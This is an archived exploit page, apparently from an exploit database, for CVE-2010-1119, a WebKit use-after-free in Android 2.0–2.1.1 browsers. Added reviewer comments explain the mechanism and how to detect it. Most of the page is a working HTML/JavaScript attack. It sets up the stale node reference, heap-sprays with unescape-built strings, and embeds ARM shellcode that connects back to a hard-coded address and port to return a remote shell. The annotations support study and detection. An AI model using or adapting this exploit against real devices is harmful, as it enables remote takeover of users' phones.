
# Title : Android 2.0 ,2.1, 2.1.1 WebKit Use-After-Free Exploit
# Published : 2011-03-14
# Author : MJ Keith


<html>
<!-- 
# Exploit Title: android exploit for 2010-1119 use after free
# Date: 2011/03/11
# Author: MJ Keith
# Software Link: http://www.android.com/
# Version: 2.0 ,2.1 , 2.1.1
# Tested on: Android
# CVE : 2010-1119

This is the exploit used in my Austin bsides presentation that returns a shell. The slides are at http://www.slideshare.net/mjza/bsides
email: mkeith AT exploitscience.org
-->

<!--
  Reviewer notes (defensive context; not part of the original):
  - Historical proof-of-concept for the WebKit use-after-free referenced in
    the header (CVE-2010-1119) on the Android versions listed there. The
    header names no other affected versions; nothing here should be read as
    applying to later releases.
  - Mechanism as visible below: a JavaScript reference to a DOM attribute's
    child node is kept after the node is removed, a large amount of string
    data is written into the document, and the stale reference is then read.
  - Detection angle: a page that detaches DOM nodes, keeps handles to their
    children, and then document.write()s hundreds of multi-kilobyte
    unescape()-built strings is a generic heap-spray shape worth alerting on
    in web proxy or browser telemetry. The connect-back address in the
    payload (port 2222, 10.0.2.2 per the author's comments) is a lab address,
    not a real indicator.
  - Markup style: `language="JavaScript"` on <script>, an inline `onload=`
    handler and unquoted attribute values are all legacy forms; kept
    verbatim here since this is an archived PoC.
-->

<head>
<script language="JavaScript">
function heap()
{

// Look up the target <p>, take its "id" attribute node, and keep a handle to
// the attribute's child nodes (in the DOM of that era an Attr carried a child
// Text node). `nodes` is an implicit global (no `var`) and is read again at
// the very end of the spray.
var id = document.getElementById("target");
var attribute = id.getAttributeNode('id');
nodes = attribute.childNodes;
// Detach the element from the body, then remove the attribute's child. From
// this point nodes[0] refers to a node the DOM tree no longer holds; the
// CVE named in the header is the engine-side bug this relies on.
document.body.removeChild(id);
attribute.removeChild(nodes[0]);
// Defer the rest by one tick. The loop allocates 70000 short strings that are
// not retained (`s` is overwritten each pass) — presumably allocator churn
// before the spray; the exact intent is not verifiable from this file.
setTimeout(function() { for (var i = 0; i < 70000; i++) {var s = new String(unescape("u0058u0058")); };


// Three building blocks: a filler string, a repeated two-word pattern, and the
// payload. NOTE(review): in this copy the `shell` literal is split across two
// source lines, so the file does not parse as pasted.
var scode = unescape("u0060u0060");
var scode2 = unescape("u5005ue1a0");
var shell = unescape("u0002ue3a0u1001ue3a0u2005ue281u708cue3a0u708due287u0080uef00u6000ue1a0u1084ue28fu2010ue3a0u708due3a0
u708eue287u0080uef00u0006ue1a0u1000ue3a0u703fue3a0u0080uef00u0006ue1a0u1001ue3a0u703fue3a0u0080uef00u0006ue1a0u1002ue3a0u703fue3a0u0080uef00u2001ue28fuff12ue12fu4040u2717udf80ua005ua508u4076u602eu1b6dub420ub401u4669u4052u270budf80u2f2fu732fu7379u6574u2f6du6962u2f6eu6873u2000u2000u2000u2000u2000u2000u2000u2000u2000u2000u0002");
// Connect-back port and address are hard-coded (author's comments below).
// 10.0.2.2 is the Android emulator's alias for the host machine, which fits
// "Tested on: Android" in the header — a lab setup, not a live endpoint.
shell += unescape("uae08"); // Port = 2222
shell += unescape("u000au0202"); // IP = 10.0.2.2
shell += unescape("u2000u2000"); // string terminate

 // Double both strings in lockstep until `scode` exceeds 0x1000 characters;
 // `scode2` is doubled the same number of times. Only scode's length is
 // checked.
 do
 {
  scode += scode;
  scode2 += scode2;

 } while (scode.length<=0x1000);
 
// Append the payload to the end of the pattern string (no semicolon; relies
// on automatic semicolon insertion).
scode2 += shell
 

        // Spray: write 300 entries into the document. Indices below 130 get
        // the filler string, indices above 130 get pattern+payload; index 130
        // itself is never assigned, so document.write(target[130]) emits the
        // text "undefined". `target` and `i` are implicit globals.
        // NOTE(review): document.write() after the load event implicitly
        // reopens the document, so this replaces the original page content.
        target = new Array();
        for(i = 0; i < 300; i++){
          
            if (i<130){ target[i] = scode;}
            if (i>130){ target[i] = scode2;}

                  document.write(target[i]);
                  document.write("<br />");
                // Past index 250, read through the stale handle taken before
                // the node was removed. The expression has no other effect;
                // this read is the use-after-free the page title refers to.
                if (i>250){
                       //  alert("freeze");
                         nodes[0].textContent}

}

 }, 0);
}
</script>
</head>
<!-- Inline handler runs heap() once the document has been parsed. -->
<body onload=heap()>
<p id=target></p>
</body>
</html>